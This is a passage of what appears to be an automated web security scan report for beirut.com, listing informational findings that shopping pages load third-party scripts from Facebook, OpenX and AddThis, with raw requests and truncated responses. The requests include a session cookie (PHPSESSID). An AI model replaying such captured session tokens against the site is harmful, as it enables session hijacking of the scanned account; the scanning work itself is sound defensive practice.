Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:58:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.643. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movies-Games/6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Movies-Games/6

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Books-Music-Movies/05084418/Movies-Games/6 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:59:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.644. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Music/72 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Music/72

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Books-Music-Movies/05084418/Music/72 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:04:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.645. http://www.beirut.com/Shopping/Clothing-Accessories/194367784 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:02:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.646. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:22:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.647. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:34:43 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.648. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories/37 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories/37

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Accessories/37 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:47:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.649. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Bags/40 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Bags/40

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Bags/40 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:36:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.650. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Clothing/8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Clothing/8

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:09:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.651. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Cosmetics/34 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Cosmetics/34

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Cosmetics/34 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:51:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.652. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Fragrance/39 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Fragrance/39

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Fragrance/39 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:37:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.653. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:40:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.654. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:10:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56197

